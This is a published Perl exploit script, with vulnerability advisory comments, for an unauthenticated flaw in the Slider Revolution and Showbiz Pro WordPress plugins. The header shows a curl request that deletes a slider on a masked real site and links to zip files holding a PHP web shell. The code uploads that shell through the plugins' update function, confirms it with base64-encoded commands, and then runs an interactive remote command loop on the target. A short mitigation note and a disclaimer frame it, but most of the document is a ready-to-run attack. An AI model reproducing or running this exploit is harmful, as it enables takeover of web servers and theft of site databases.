289 lines
No EOL
10 KiB
Perl
Executable file
289 lines
No EOL
10 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
#
|
|
# Title: Slider Revolution/Showbiz Pro shell upload exploit
|
|
# Author: Simo Ben youssef
|
|
# Contact: Simo_at_Morxploit_com
|
|
# Discovered: 15 October 2014
|
|
# Coded: 15 October 2014
|
|
# Updated: 25 November 2014
|
|
# Published: 25 November 2014
|
|
# MorXploit Research
|
|
# http://www.MorXploit.com
|
|
# Vendor: ThemePunch
|
|
# Vendor url: http://themepunch.com
|
|
# Software: Revslider/Showbiz Pro
|
|
# Versions: <= 3.0.95 (Revslider) / Version: <= 1.7.1 (Showbiz Pro)
|
|
# Products url:
|
|
# http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380
|
|
# http://codecanyon.net/item/showbiz-pro-responsive-teaser-wordpress-plugin/4720988
|
|
# Vulnerable scripts:
|
|
# revslider/revslider_admin.php
|
|
# showbiz/showbiz_admin.php
|
|
#
|
|
# About the plugins:
|
|
# The #1 Slider plugin, used by millions, slider revolution is an all-purpose slide displaying solution that allows for showing almost any
|
|
# kind of content whith highly customizable, transitions, effects and custom animations.
|
|
# Showbiz Pro is a responsive teaser displaying solution that allows you to show WordPress Posts or any Custom Content with a set
|
|
# amount of teaser items.
|
|
#
|
|
# Description:
|
|
# Slider Revolution and Showbiz Pro fail to check authentication in revslider_admin.php/showbiz_admin.php allowing an unauthenticated
|
|
# attacker to abuse administrative features.
|
|
# Some of the features include:
|
|
# Creating/Deleting/Updating sliders
|
|
# Importing/exporting sliders
|
|
# Updading plugin
|
|
# For a full list of functions please see revslider_admin.php/showbiz_admin.php
|
|
#
|
|
# PoC on revslider:
|
|
# 1- Deleting a slider:
|
|
# root@host:/home/rootuser# curl -v --data "action=revslider_ajax_action&client_action=delete_slider&data[sliderid]=1"
|
|
# http://****.com/wp-admin/admin-ajax.php
|
|
# * Connected to ****.com (**.**.**.**) port 80 (#0)
|
|
# > POST /wp-admin/admin-ajax.php HTTP/1.1
|
|
# > User-Agent: curl/7.35.0
|
|
# > Host: ****.com
|
|
# > Accept: */*
|
|
# > Content-Length: 73
|
|
# > Content-Type: application/x-www-form-urlencoded
|
|
# >
|
|
# * upload completely sent off: 73 out of 73 bytes
|
|
# < HTTP/1.1 200 OK
|
|
# < Date: Fri, 24 Oct 2014 23:25:07 GMT
|
|
# * Server Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 is not blacklisted
|
|
# < Server: Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
|
|
# < X-Powered-By: PHP/5.4.18
|
|
# < X-Robots-Tag: noindex
|
|
# < X-Content-Type-Options: nosniff
|
|
# < Expires: Wed, 11 Jan 1984 05:00:00 GMT
|
|
# < Cache-Control: no-cache, must-revalidate, max-age=0
|
|
# < Pragma: no-cache
|
|
# < X-Frame-Options: SAMEORIGIN
|
|
# < Set-Cookie: PHPSESSID=a23ex1c8a573f1d1xd28c301793ba022c; path=/
|
|
# < Transfer-Encoding: chunked
|
|
# < Content-Type: text/html; charset=UTF-8
|
|
# <
|
|
# * Connection #0 to host http://****.com left intact
|
|
#
|
|
# {"success":true,"message":"The slider deleted","is_redirect":true,"redirect_url":"http:\/\/****.com\/wp-admin\/admin.php?page=revslider&view=sliders"}
|
|
#
|
|
# 2- Uploading an web shell:
|
|
# The following perl exploit will try to upload an HTTP php shell through the the update_plugin function
|
|
# To use the exploit make sure you download first the revslider.zip and showbiz.zip files which contain cmd.php
|
|
# http://www.morxploit.com/morxploits/revslider.zip
|
|
# http://www.morxploit.com/morxploits/showbiz.zip
|
|
# and save them it in the same directory where you have the exploit.
|
|
#
|
|
# Demo:
|
|
# perl morxrev.pl http://localhost revslider
|
|
# ===================================================
|
|
# --- Revslider/Showbiz shell upload exploit
|
|
# --- By: Simo Ben youssef <simo_at_morxploit_com>
|
|
# --- MorXploit Research www.MorXploit.com
|
|
# ===================================================
|
|
# [*] Target set to revslider
|
|
# [*] MorXploiting http://localhost
|
|
# [*] Sent payload
|
|
# [+] Payload successfully executed
|
|
# [*] Checking if shell was uploaded
|
|
# [+] Shell successfully uploaded
|
|
#
|
|
# Linux MorXploit 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
|
|
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
|
#
|
|
# www-data@MorXploit:~$
|
|
#
|
|
# Download:
|
|
# Exploit:
|
|
# http://www.morxploit.com/morxploits/morxrevbiz.pl
|
|
# Exploit update zip files:
|
|
# http://www.morxploit.com/morxploits/revslider.zip
|
|
# http://www.morxploit.com/morxploits/showbiz.zip
|
|
#
|
|
# Requires LWP::UserAgent
|
|
# apt-get install libwww-perl
|
|
# yum install libwww-perl
|
|
# perl -MCPAN -e 'install Bundle::LWP'
|
|
# For SSL support:
|
|
# apt-get install liblwp-protocol-https-perl
|
|
# yum install perl-Crypt-SSLeay
|
|
#
|
|
# Mitigation:
|
|
# Besides the recently LFI vulnerability that was published couple months ago, this is another vulnerability that revslider developers have
|
|
# decided to patch without releasing a full security advisory, leaving thousands of revslider users who didn't update their plugin to the
|
|
# latest version (=> 3.0.96) vulnerable to this nasty flaw, revsliders developers will argue the fact that their slider comes with an
|
|
# auto-update feature, but the problem is that this plugin is bundled with a lot of themes, which means that those themes users may not get
|
|
# plugin updates or will have to pay to get the update. In other words revslider developers believe that every user should have the
|
|
# auto-update feature on, otherwise ... you are screwed.
|
|
# Obviously this is way more critical than the LFI vulnerability because it allows shell access giving attackers access to the target system
|
|
# as well as the ability to dump the entire wordpress database locally.
|
|
# That being said, upgrade immediately to the latest version or disable/switch to another plugin.
|
|
# As for Showbiz Pro, sadly the vulnerability has never been patched as we successfully exploited it in the latest version (1.7.1).
|
|
#
|
|
# Author disclaimer:
|
|
# The information contained in this entire document is for educational, demonstration and testing purposes only.
|
|
# Author cannot be held responsible for any malicious use or damage. Use at your own risk.
|
|
#
|
|
# Got comments or questions?
|
|
# Simo_at_MorXploit_dot_com
|
|
#
|
|
# Did you like this exploit?
|
|
# Feel free to buy me a beer =)
|
|
# My btc address: 1Ko12CUAFoWn8syrvg4aQokFedNiwD6d7u
|
|
# Cheers!
|
|
|
|
use LWP::UserAgent;
|
|
use MIME::Base64;
|
|
use strict;
|
|
|
|
sub banner {
|
|
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
|
|
print "===================================================\n";
|
|
print "--- Revslider/Showbiz shell upload exploit\n";
|
|
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
|
|
print "--- MorXploit Research www.MorXploit.com\n";
|
|
print "===================================================\n";
|
|
}
|
|
|
|
if (!defined ($ARGV[0] && $ARGV[1])) {
|
|
banner();
|
|
print "perl $0 <target> <plugin>\n";
|
|
print "perl $0 http://localhost revslider\n";
|
|
print "perl $0 http://localhost showbiz\n";
|
|
exit;
|
|
}
|
|
|
|
my $zip1 = "revslider.zip";
|
|
my $zip2 = "showbiz.zip";
|
|
|
|
unless (-e ($zip1 && $zip2))
|
|
{
|
|
banner();
|
|
print "[-] $zip1 or $zip2 not found! RTFM\n";
|
|
exit;
|
|
}
|
|
|
|
my $host = $ARGV[0];
|
|
my $plugin = $ARGV[1];
|
|
my $action;
|
|
my $update_file;
|
|
|
|
if ($plugin eq "revslider") {
|
|
$action = "revslider_ajax_action";
|
|
$update_file = "$zip1";
|
|
}
|
|
elsif ($plugin eq "showbiz") {
|
|
$action = "showbiz_ajax_action";
|
|
$update_file = "$zip2";
|
|
}
|
|
else {
|
|
banner();
|
|
print "[-] Wrong plugin name\n";
|
|
print "perl $0 <target> <plugin>\n";
|
|
print "perl $0 http://localhost revslider\n";
|
|
print "perl $0 http://localhost showbiz\n";
|
|
exit;
|
|
}
|
|
my $target = "wp-admin/admin-ajax.php";
|
|
my $shell = "wp-content/plugins/$plugin/temp/update_extract/$plugin/cmd.php";
|
|
|
|
sub randomagent {
|
|
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
|
|
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
|
|
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
|
|
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
|
|
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
|
|
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
|
|
);
|
|
my $random = $array[rand @array];
|
|
return($random);
|
|
}
|
|
my $useragent = randomagent();
|
|
|
|
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
|
|
$ua->timeout(10);
|
|
$ua->agent($useragent);
|
|
my $status = $ua->get("$host/$target");
|
|
unless ($status->is_success) {
|
|
banner();
|
|
print "[-] Xploit failed: " . $status->status_line . "\n";
|
|
exit;
|
|
}
|
|
|
|
banner();
|
|
print "[*] Target set to $plugin\n";
|
|
print "[*] MorXploiting $host\n";
|
|
|
|
my $exploit = $ua->post("$host/$target", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]);
|
|
|
|
print "[*] Sent payload\n";
|
|
|
|
if ($exploit->decoded_content =~ /Wrong update extracted folder/) {
|
|
print "[+] Payload successfully executed\n";
|
|
}
|
|
|
|
elsif ($exploit->decoded_content =~ /Wrong request/) {
|
|
print "[-] Payload failed: Not vulnerable\n";
|
|
exit;
|
|
}
|
|
|
|
elsif ($exploit->decoded_content =~ m/0$/) {
|
|
print "[-] Payload failed: Plugin unavailable\n";
|
|
exit;
|
|
}
|
|
|
|
else {
|
|
$exploit->decoded_content =~ /<\/b>(.*?)<br>/;
|
|
print "[-] Payload failed:$1\n";
|
|
print "[-] " . $exploit->decoded_content unless (defined $1);
|
|
print "\n";
|
|
exit;
|
|
}
|
|
|
|
print "[*] Checking if shell was uploaded\n";
|
|
|
|
sub rndstr{ join'', @_[ map{ rand @_ } 1 .. shift ] }
|
|
my $rndstr = rndstr(8, 1..9, 'a'..'z');
|
|
my $cmd1 = encode_base64("echo $rndstr");
|
|
my $status = $ua->get("$host/$shell?cmd=$cmd1");
|
|
|
|
if ($status->decoded_content =~ /system\(\) has been disabled/) {
|
|
print "[-] Xploit failed: system() has been disabled\n";
|
|
exit;
|
|
}
|
|
|
|
elsif ($status->decoded_content !~ /$rndstr/) {
|
|
print "[-] Xploit failed: " . $status->status_line . "\n";
|
|
exit;
|
|
}
|
|
|
|
elsif ($status->decoded_content =~ /$rndstr/) {
|
|
print "[+] Shell successfully uploaded\n";
|
|
}
|
|
my $cmd2 = encode_base64("whoami");
|
|
my $whoami = $ua->get("$host/$shell?cmd=$cmd2");
|
|
my $cmd3 = encode_base64("uname -n");
|
|
my $uname = $ua->get("$host/$shell?cmd=$cmd3");
|
|
my $cmd4 = encode_base64("id");
|
|
my $id = $ua->get("$host/$shell?cmd=$cmd4");
|
|
my $cmd5 = encode_base64("uname -a");
|
|
my $unamea = $ua->get("$host/$shell?cmd=$cmd5");
|
|
print $unamea->decoded_content;
|
|
print $id->decoded_content;
|
|
my $wa = $whoami->decoded_content;
|
|
my $un = $uname->decoded_content;
|
|
chomp($wa);
|
|
chomp($un);
|
|
|
|
while () {
|
|
print "\n$wa\@$un:~\$ ";
|
|
chomp(my $cmd=<STDIN>);
|
|
if ($cmd eq "exit")
|
|
{
|
|
print "Aurevoir!\n";
|
|
exit;
|
|
}
|
|
my $ucmd = encode_base64("$cmd");
|
|
my $output = $ua->get("$host/$shell?cmd=$ucmd");
|
|
print $output->decoded_content;
|
|
} |